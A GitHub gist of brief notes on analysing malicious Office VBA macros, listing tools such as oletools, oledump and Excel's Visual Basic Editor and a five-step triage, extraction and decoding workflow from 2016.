Skip to content

Instantly share code, notes, and snippets.

@adricnet

adricnet/some_vba_notes.md

Last active December 27, 2019 21:01
Show Gist options
  • Save adricnet/4553b740414e285cabe6153b8128c9cc to your computer and use it in GitHub Desktop.
Save adricnet/4553b740414e285cabe6153b8128c9cc to your computer and use it in GitHub Desktop.
Download ZIP
Some notes on VBA analysis
Raw
some_vba_notes.md

Some VBA notes

Tools

  • Unix(Remnux): viper.li, oletools, & Didier's tools
  • Windows: Office Excel (VBE) & Visual Studio Community (VSC), officemalscanner
  • Editors: scite, VS Code

Dependencies

  • viper.li for sample management
  • olevba or officemalscanner for triage
  • oledump for analysis extraction

MS Office Visual Basic Editor (VBE)

There's a feature-packed Visual Basic Applications development environment in Office products. Excel is a good choice. You can enable it in Options and then get in the Office ribbon: [https://msdn.microsoft.com/en-us/library/bb608625.aspx](Enable Developer Tab on Ribbon (MSDN))

VBE has good syntax highlighting, inspection, and debugging. It's great for running isolated bits of code after they are defanged, but doesn't currently offer a way to load to a pause (break) as does OllyDbg or web debuggers (with the 'debug;' trick).

All current versions of Office have this support, including apparently Office Mac 2016(!). MS Office is commercial software available via retail, O365 SaaS, and enterprise licensing.

MS Visual Studio Community (VSC)

Visual Studio IDE has full support for developing complex applications in VB and this extends to syntax support for VBA. VSC debugger is full featured, better in every way than the VBE and incapable of opening Office documents directly.

The Community edition of VS is now generally available for free use with online registration required, though VS is commerical software.

https://www.visualstudio.com/

VS code

Visual Studio Code is a programmer's editor and is released as free software available from MS online for major platforms.

Code has native support for Visual Basic (from the VS products) that provide syntax checking and highlighting for VBA.

https://code.visualstudio.com/

$VISUAL

Standard Linux and available programming editors are good at text manipulations useful for code analysis. Remnux ships Scite, vim, and others.

Process Oct 2016

A combination of static and dynamic analysis has been effective against macro malcode samples seen recently:

  1. Triage DOC/RTF for macros presence (viper,olevba,officemalscanner)
  2. Extract VBA code; Minimal static cleanup (oledump, scite)
  3. Isolate string encode/decode routines & encoded strings (scite, grep)
  4. Careful execution of decoding code in Excel against strings => network indicators (Excel)
  5. Further code reversing in VBE or VSC for other features, such as file decryption. (scite, Excel)

Tricks

Refs

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment